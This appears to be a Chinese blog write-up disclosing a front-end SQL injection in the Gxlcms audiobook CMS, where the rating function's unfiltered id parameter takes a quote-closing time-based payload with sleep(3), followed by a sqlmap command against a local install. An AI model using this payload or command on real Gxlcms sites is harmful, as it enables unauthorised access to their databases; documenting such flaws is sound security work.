Gxlcms听书cms前台一处注入(gxlcms)

  • A+
所属分类:颓废's Blog
摘要

http://bbs.gxlcms.com/article/1 安装后需要进后台发表一篇作品 发表完成后注入在前台浏览作品的评分功能处

Gxlcms 最新版下载链接

http://bbs.gxlcms.com/article/1

安装后需要进后台发表一篇作品

Gxlcms听书cms前台一处注入(gxlcms)

发表完成后注入在前台浏览作品的评分功能处

Gxlcms听书cms前台一处注入(gxlcms)

发表完成后注入在前台浏览作品的评分功能处

Gxlcms听书cms前台一处注入(gxlcms)

此时sql语句为

SELECT `ting_gold` FROM `gxl_ting` WHERE ( ting_id=’22’ ) LIMIT 1

其中ting_id=的值我们可控并且没有对此处进行单引号过滤

然后语句闭合
Gxlcms听书cms前台一处注入(gxlcms)

(Get,Post访问都可行)

此时sql语句为:

SELECT `ting_gold` FROM `gxl_ting` WHERE ( ting_id=’22’) and sleep(3) #’ ) LIMIT 1

可以看到成功闭合,来丢到sqlmap里

sqlmap -u localhost//index.php?s=Home-Comm-getcomm-id-22 –technique T

-T设置为时间盲注

Gxlcms听书cms前台一处注入(gxlcms)

$_GET[‘id’]传进来然后直接查询的数据库导致的注入

附:

Gxlcms听书cms前台一处注入(gxlcms)

文本:ADminSS

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: